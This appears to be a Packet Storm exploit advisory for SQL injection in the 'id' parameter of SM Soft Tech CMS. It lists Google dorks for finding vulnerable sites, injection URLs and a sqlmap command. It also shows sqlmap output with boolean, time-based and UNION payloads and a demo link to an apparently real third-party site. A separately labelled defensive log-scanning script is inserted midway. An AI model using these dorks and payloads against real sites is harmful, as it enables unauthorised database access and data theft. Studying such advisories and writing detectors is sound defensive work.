SM Soft Tech CMS 1.0 SQL Injection

2016-03-27T00:00:00
ID PACKETSTORM:136441
Type packetstorm
Reporter Shelesh Rauthan
Modified 2016-03-27T00:00:00

Description

==========================================================  
[+] Title :- SM SOFT TECH CMS - SQL INJECTION  
[+] Date :- 24 - MAR - 2016  
[+] Vendor Homepage :- http://www.smsofttech.net/  
[+] Version :- All Versions  
[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows  
[+] Category :- webapps  
[+] Google Dorks :- "Developed by SM SOFT TECH"  
"Design & Developed by SM SOFT TECH" +inurl:/.php?id=  
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)  
[+] Team name :- Team Alastor Breeze, Intelligent-Exploit  
[+] Official Website :- intelligentexploit.com  
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R, m777k  
[+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha  
[+] Contact :- indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com  
  
=========================================================  
[+] Severity Level :- High  
  
[+] Request Method(s) :- GET / POST  
  
[+] Vulnerable Parameter(s) :- id  
  
[+] Affected Area(s) :- Entire admin, database, Server  
  
[+] About :- Unauthenticated SQL injection via multiple PHP files, causing an SQL error  
  
[+] SQL vulnerable File :- /home/***/domains/XXX.edu.bd/public_html/event-details.php  
  
[+] POC :- http://127.0.0.1/event-details.php?id=[SQL]'  
  
The SQL injection web vulnerability can be exploited by remote attackers without any privilege of a web-application user account or any user interaction.  
  
  
http://www.[WEBSITE].com/event-details.php?id=4' order by [SQL INJECTION]--+  
http://www.[WEBSITE].com/event-details.php?id=4' union all select [SQL INJECTION]--+  
  
SQLMap  
++++++++++++++++++++++++++  
python sqlmap.py --url "http://127.0.0.1/XXX.php?id=[SQL]" --dbs  
++++++++++++++++++++++++++  
---  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=1' AND 8467=8467 AND 'iGHF'='iGHF  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)  
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))PhJR) AND 'cmRt'='cmRt  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 9 columns  
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71707a7671,0x5758774b584a7345496f,0x7170786b71),NULL,NULL,NULL,NULL--  
---  
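From the defender's side, the three payload shapes sqlmap reports above (boolean-based, time-based SLEEP, and UNION) are easy to spot in web server access logs when the `id` parameter should only ever be an integer. The following added example (not part of the advisory, and not SM Soft Tech code) parses constructed nginx-style log lines, extracts `id`, and labels requests whose value is not a plain number; the log lines, IPs and helper names are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed nginx-style access log lines (not from the advisory); the payloads
# mirror the shapes shown in the sqlmap output above, percent-encoded as a browser would send them.
SAMPLE_LOG = r"""
203.0.113.5 - - [24/Mar/2016:10:01:02 +0000] "GET /event-details.php?id=4 HTTP/1.1" 200 5120
203.0.113.9 - - [24/Mar/2016:10:01:07 +0000] "GET /event-details.php?id=1'%20AND%208467=8467%20AND%20'iGHF'='iGHF HTTP/1.1" 200 5120
203.0.113.9 - - [24/Mar/2016:10:01:09 +0000] "GET /event-details.php?id=1'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))PhJR)%20AND%20'cmRt'='cmRt HTTP/1.1" 200 5120
203.0.113.9 - - [24/Mar/2016:10:01:12 +0000] "GET /event-details.php?id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x71707a7671,0x5758774b584a7345496f)-- HTTP/1.1" 200 5120
203.0.113.7 - - [24/Mar/2016:10:01:15 +0000] "GET /notice.php?id=6' HTTP/1.1" 500 312
"""

# client ip, timestamp, method, request target, status code
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Ordered from most to least specific so each request gets exactly one label.
PATTERNS = [
    ("union", re.compile(r"\bUNION\b.*\bSELECT\b", re.I)),
    ("time-based", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("boolean-based", re.compile(r"\b(AND|OR)\b\s+\S+\s*=\s*\S+", re.I)),
]

def classify_id(value):
    """Return None for a well-formed numeric id, otherwise an injection class."""
    if value.isdigit():
        return None
    for label, rx in PATTERNS:
        if rx.search(value):
            return label
    # Anything else that is not an integer (e.g. a lone trailing quote) is still an anomaly.
    return "malformed"

def scan_log(text):
    """Return (ip, path, label, status) for every request whose id is not a plain integer."""
    findings = []
    for line in text.strip().splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, target, status = m.groups()
        parts = urlsplit(target)
        # parse_qs already percent-decodes the value, so the payload is inspected in clear text
        for raw in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            label = classify_id(raw)
            if label:
                findings.append((ip, parts.path, label, int(status)))
    return findings
```

A 500 response paired with a quote in `id` (the last line) is the "SQL error" the advisory describes and is worth alerting on even before any recognisable payload appears.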
  
[+] DEMO :- http://orbitcreditsc.com/event-details.php?id=4'  
  
  
  
=======================================================  